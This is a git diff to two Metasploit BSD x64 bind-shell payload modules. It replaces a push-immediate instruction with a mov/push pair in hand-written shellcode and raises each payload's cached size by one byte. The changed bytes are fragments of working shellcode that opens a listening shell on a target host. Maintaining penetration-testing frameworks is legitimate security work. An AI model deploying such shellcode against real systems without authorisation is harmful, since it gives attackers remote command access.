diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb index b5ab5d45cc..c6a5ff3f38 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 89 + CachedSize = 90 include Msf::Payload::Single include Msf::Payload::Bsd @@ -46,7 +46,8 @@ module Metasploit3 "\x52" +# push %rdx # "\x52" +# push %rdx # "\x52" +# push %rdx # - "\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 # + "\xba\x00\x1c\x11\x5C" +# mov edx,0x5c111c00 # + "\x52" +# push %rdx # "\x48\x89\xe6" +# mov %rsp,%rsi # "\x6a\x1c" +# pushq $0x1c # "\x5a" +# pop %rdx # diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index c80ec4dfe5..8d92cadcb6 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module Metasploit3 - CachedSize = 87 + CachedSize = 88 include Msf::Payload::Single include Msf::Payload::Bsd @@ -44,7 +44,8 @@ module Metasploit3 "\x0f\x05" +# syscall # "\x48\x97" +# xchg %rax,%rdi # "\x52" +# push %rdx # - "\x68\x00\x02\x11\x5c" +# pushq $0x5c110200 # + "\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 # + "\x52" +# push %rdx # "\x48\x89\xe6" +# mov %rsp,%rsi # "\x6a\x10" +# pushq $0x10 # "\x5a" +# pop %rdx #